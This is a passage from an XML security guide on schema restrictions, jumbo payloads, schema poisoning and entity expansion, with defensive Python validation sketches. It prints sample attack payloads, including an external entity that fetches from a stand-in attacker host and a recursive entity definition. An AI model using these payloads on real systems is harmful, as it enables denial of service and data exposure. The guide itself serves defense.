     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type allows negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. To avoid that logical vulnerability, the schema should use &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; instead of &amp;lt;tt&amp;gt;integer&amp;lt;/tt&amp;gt;. &lt;br /&gt;
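&lt;br /&gt;
The arithmetic behind this logical vulnerability can be sketched in Python. The helper names are hypothetical, and &amp;lt;tt&amp;gt;parse_positive_integer&amp;lt;/tt&amp;gt; only approximates the &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; data type (an optional plus sign, digits, and a value above zero); it is an application-level illustration, not a replacement for schema validation.&lt;br /&gt;

```python
import re
from decimal import Decimal

# Optional plus sign followed by ASCII digits only.
POSITIVE_INTEGER = re.compile(r"\+?[0-9]+")


def parse_positive_integer(text):
    """Accept only digits with an optional plus sign and a value above zero."""
    if POSITIVE_INTEGER.fullmatch(text) is None or int(text) == 0:
        raise ValueError(f"not a positive integer: {text!r}")
    return int(text)


def total(price, quantity):
    """Compute the final price as price*quantity."""
    return Decimal(price) * quantity


# With a plain integer the attacker can push the total below zero.
negative_total = total("10", int("-3"))
print(negative_total)  # -30

# With the stricter parser the same input is rejected before any arithmetic.
try:
    parse_positive_integer("-3")
    rejected = False
except ValueError:
    rejected = True
print(rejected)  # True
```

A quantity of -3 at a price of 10 yields a total of -30, which is the negative result on the user’s account mentioned above.&lt;br /&gt;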
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever user-controlled values are used as denominators in a division, developers should avoid allowing the number zero. In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that these data types are commonly used to express only real numbers such as prices, where the special values make no sense. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
With the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt;, the price value cannot be set to Infinity or NaN, because these values are not valid and the document is rejected during validation. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
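&lt;br /&gt;
A short Python sketch shows why the special values are dangerous for an application that expects only real numbers. The price limit and the function names are assumptions made for this example, and the regular expression approximates the lexical form of the &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; data type (optional sign, digits, optional fraction).&lt;br /&gt;

```python
import math
import re
from decimal import Decimal

# Approximate lexical form of xs:decimal: optional sign, digits, optional fraction.
XS_DECIMAL = re.compile(r"[+-]?([0-9]+(\.[0-9]*)?|\.[0-9]+)")

PRICE_LIMIT = 1000.0  # hypothetical business rule


def exceeds_limit(price):
    """Naive check that only rejects prices above the limit."""
    return price > PRICE_LIMIT


def parse_decimal(text):
    """Reject anything outside the decimal lexical form, such as NaN or INF."""
    if XS_DECIMAL.fullmatch(text) is None:
        raise ValueError(f"not a decimal: {text!r}")
    return Decimal(text)


nan_price = float("NaN")
print(exceeds_limit(nan_price))    # False: every comparison with NaN is false
print(math.isnan(nan_price * 3))   # True: the special value propagates
print(math.isinf(float("INF")))    # True

print(parse_decimal("10.50"))      # 10.50
```

Because comparisons against NaN are always false, a limit check written as a single comparison lets the value through, and every later calculation inherits it.&lt;br /&gt;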
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should be restricted to specific sets: traffic lights have only three colors, only 12 months are available, and so on. The schema can enforce these restrictions for each element or attribute. This is the ideal whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only values between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for an SSN.&lt;br /&gt;
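&lt;br /&gt;
The same pattern can be checked in application code. The following Python sketch uses &amp;lt;tt&amp;gt;re.fullmatch&amp;lt;/tt&amp;gt; because a schema pattern must match the entire value; the function name &amp;lt;tt&amp;gt;is_valid_ssn&amp;lt;/tt&amp;gt; and the sample values are hypothetical.&lt;br /&gt;

```python
import re

# Same expression as the pattern facet in the schema above.
SSN = re.compile(r"[0-9]{3}-[0-9]{2}-[0-9]{4}")


def is_valid_ssn(value):
    """Return True only when the whole value matches the pattern."""
    return SSN.fullmatch(value) is not None


print(is_valid_ssn("123-45-6789"))    # True
print(is_valid_ssn("123-45-67890"))   # False
print(is_valid_ssn("x123-45-6789"))   # False
```

Using a search that matches only part of the value would accept the last two inputs, which is a common mistake when porting schema patterns to code.&lt;br /&gt;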
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components, introduced in XML Schema 1.1, constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; disallowing the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
Failing to define a maximum number of occurrences may force the application to cope with an extreme number of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''unbounded'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) number of &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements. This is a common finding, since developers do not normally want to restrict the maximum number of occurrences. Applications using limitless occurrences should test what happens when they receive an extremely large number of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; value.&lt;br /&gt;
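&lt;br /&gt;
Where an &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; value cannot be removed from the schema, an application-side cap is one possible complement. The following Python sketch is only an illustration under stated assumptions: the limit &amp;lt;tt&amp;gt;MAX_BUY_ELEMENTS&amp;lt;/tt&amp;gt; and both function names are hypothetical, and the document is assumed to be already parsed with the standard &amp;lt;tt&amp;gt;xml.etree.ElementTree&amp;lt;/tt&amp;gt; module:&lt;br /&gt;
&lt;br /&gt;
```python
import xml.etree.ElementTree as ET

# Hypothetical application-side limit; choose a value the service can handle.
MAX_BUY_ELEMENTS = 1000


def count_buy_elements(operation, limit=MAX_BUY_ELEMENTS):
    """Return the number of buy elements, or raise once the limit is exceeded."""
    count = 0
    for _ in operation.iter("buy"):
        count += 1
        if count > limit:
            raise ValueError("too many buy elements (limit %d)" % limit)
    return count


def build_operation(n):
    """Build an operation element holding n buy children (example helper)."""
    operation = ET.Element("operation")
    for i in range(n):
        buy = ET.SubElement(operation, "buy")
        ET.SubElement(buy, "id").text = str(i)
    return operation
```
&lt;br /&gt;
Because this check runs after parsing, it limits processing work rather than parser memory. A streaming parser could apply the same counter while reading.&lt;br /&gt;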
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;soapenv:Envelope xmlns:soapenv=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot; xmlns:ext=&amp;quot;http://com/ibm/was/wssample/sei/echo/b2b/external&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;soapenv:Header '''LARGENAME1'''=&amp;quot;'''LARGEVALUE'''&amp;quot; '''LARGENAME2'''=&amp;quot;'''LARGEVALUE2'''&amp;quot; '''LARGENAME3'''=&amp;quot;'''LARGEVALUE3'''&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''file''' SYSTEM &amp;quot;'''http://attacker/huge.xml'''&amp;quot; &amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;file;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document.&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contain a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''note.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 -rw-rw-'''rw-'''  1 user  staff  743 Jan 15 12:32 '''note.dtd'''&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML document or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
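&lt;br /&gt;
A deployment check could flag schema files that any user may modify. The following Python sketch is a minimal illustration that assumes a POSIX-style filesystem. The function name &amp;lt;tt&amp;gt;is_world_writable&amp;lt;/tt&amp;gt; is hypothetical:&lt;br /&gt;
&lt;br /&gt;
```python
import os
import stat


def is_world_writable(path):
    """Return True if any user on the system may modify the file at path."""
    mode = os.stat(path).st_mode
    # stat.filemode() renders the mode the way ls does, e.g. "-rw-rw-rw-";
    # index 8 holds the write flag for "others".
    return stat.filemode(mode)[8] == "w"
```
&lt;br /&gt;
For the listing above, a call such as &amp;lt;tt&amp;gt;is_world_writable(&amp;quot;note.dtd&amp;quot;)&amp;lt;/tt&amp;gt; would be expected to report the problem, since the last permission triplet is &amp;lt;tt&amp;gt;rw-&amp;lt;/tt&amp;gt;.&lt;br /&gt;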
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When XML documents reference remote schemas over the unencrypted Hypertext Transfer Protocol (HTTP), the communication travels in plain text, so an attacker could sniff the connection and modify the schema before it reaches the end user:&lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''http'''://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted over unencrypted HTTP. One tool available to facilitate this type of attack is mitmproxy.&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses.&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like https://example.com/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address 1.1.1.1&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker (2.2.2.2):&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address '''2.2.2.2'''&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may actually be retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; refers to another entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined in terms of entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, the schema describes a circular reference between entities:&lt;br /&gt;
 &amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;A&amp;gt;'''&amp;amp;A;'''&amp;lt;/A&amp;gt;&lt;br /&gt;
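&lt;br /&gt;
A circular reference of this kind can be detected before any expansion takes place. The following Python sketch is an illustration only. It assumes the entity definitions were already extracted into a mapping from each entity name to the names it references, and the function name &amp;lt;tt&amp;gt;find_entity_cycle&amp;lt;/tt&amp;gt; is hypothetical:&lt;br /&gt;
&lt;br /&gt;
```python
def find_entity_cycle(references):
    """Return a list of entity names forming a cycle, or None if there is none.

    references maps each entity name to the names it refers to.
    """
    visiting = []      # entities on the current expansion path
    finished = set()   # entities already proven free of cycles

    def visit(name):
        if name in finished:
            return None
        if name in visiting:
            # The path from the first occurrence back to name is the cycle.
            return visiting[visiting.index(name):] + [name]
        visiting.append(name)
        for target in references.get(name, ()):
            cycle = visit(target)
            if cycle:
                return cycle
        visiting.pop()
        finished.add(name)
        return None

    for name in references:
        cycle = visit(name)
        if cycle:
            return cycle
    return None
```
&lt;br /&gt;
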